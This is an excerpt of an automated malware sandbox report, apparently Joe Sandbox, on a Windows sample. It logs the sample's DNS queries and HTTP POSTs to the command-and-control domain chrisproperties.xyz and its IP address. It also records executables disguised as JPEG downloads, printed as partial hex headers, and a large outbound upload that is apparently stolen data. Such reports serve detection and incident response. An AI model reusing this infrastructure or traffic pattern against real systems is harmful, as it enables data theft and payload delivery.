d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:38 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:44 GMT ETag: "1303d0-58aa3f6888e00" Accept-Ranges: bytes Content-Length: 1246160 Vary: User-Agent Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:39 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT ETag: "14748-58aa3f79b3680" Accept-Ranges: bytes Content-Length: 83784 Vary: User-Agent Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Performs DNS queries to domains with low reputationShow sources
                      Source: C:\Users\user\Desktop\buIKlB688e.exeDNS query: chrisproperties.xyz
                      Posts data to a JPG file (protocol mismatch)Show sources
                      Source: unknownHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                      Source: global trafficHTTP traffic detected: POST /6.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /1.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /2.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /3.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /4.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /5.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /7.jpg HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST /main.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 77595Host: chrisproperties.xyzConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 195.133.18.140 195.133.18.140
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:34 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:01:52 GMTETag: "235d0-58aa3f702a000"Accept-Ranges: bytesContent-Length: 144848Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:34 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Mon, 07 Aug 2017 00:52:20 GMTETag: "9d9d8-5561f424ef900"Accept-Ranges: bytesContent-Length: 645592Vary: User-AgentKeep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Oct 2021 10:35:36 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Thu, 06 Jun 2019 09:00:58 GMTETag: "519d0-58aa3f3caa680"Accept-Ranges: bytesContent-Length: 334288Vary: User-AgentKeep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 